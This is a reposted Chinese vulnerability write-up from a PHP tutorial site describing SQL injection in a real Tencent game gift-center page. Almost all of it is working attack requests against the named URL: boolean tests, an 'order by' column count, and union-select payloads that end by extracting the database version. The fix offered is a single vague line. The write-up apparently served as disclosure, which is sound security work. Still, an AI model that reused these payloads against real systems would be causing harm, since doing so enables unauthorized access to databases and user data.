网站地图    收藏   

主页 > 后端 > 网站安全 >

腾讯游戏人生注入漏洞(附分析及绕过方式)

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] http://igame.qq.com/giftcenter/actinfo.php?type=allrd=0.12860660045407712op=actidlistviewalist=987 and 1=1正常http://igame.qq.com/giftcenter/actinfo.php?type=allrd=0.12860660045407712op=act......

http://igame.qq.com/giftcenter/actinfo.php?type=all&rd=0.12860660045407712&op=actidlistview&alist=987 and 1=1
正常
 
 
http://igame.qq.com/giftcenter/actinfo.php?type=all&rd=0.12860660045407712&op=actidlistview&alist=987 and 1=2
 
 
order by 13的时候正常了说明13个字段,继续union,但是发现and 1=1的时候完全正常
http://igame.qq.com/giftcenter/actinfo.php?type=all&rd=0.12860660045407712&op=actidlistview&alist=987%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13
 
and 1=2的时候失败鸟,为神马捏,初步分析是里面含有隐含的逻辑,注射成功但是由于业务逻辑无法在前台显示,可以这么试试
 
http://igame.qq.com/giftcenter/actinfo.php?type=all&rd=0.12860660045407712&op=actidlistview&alist=987 and 1=2 union select 987,987,987,987,987,987,987,987,987,987,987,987,987
 
这下成功了,然后再看看哪个字段是要被逻辑用到的吧
 
http://igame.qq.com/giftcenter/actinfo.php?type=all&rd=0.12860660045407712&op=actidlistview&alist=987%20and%201=2%20union%20select%201,1,1,987,1,1,version%28%29,987,987,987,987,987,1
 
这样就可以了嘛,用这个字段显示就可以
 


 
 
 
修复方案:
通常的防注入

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论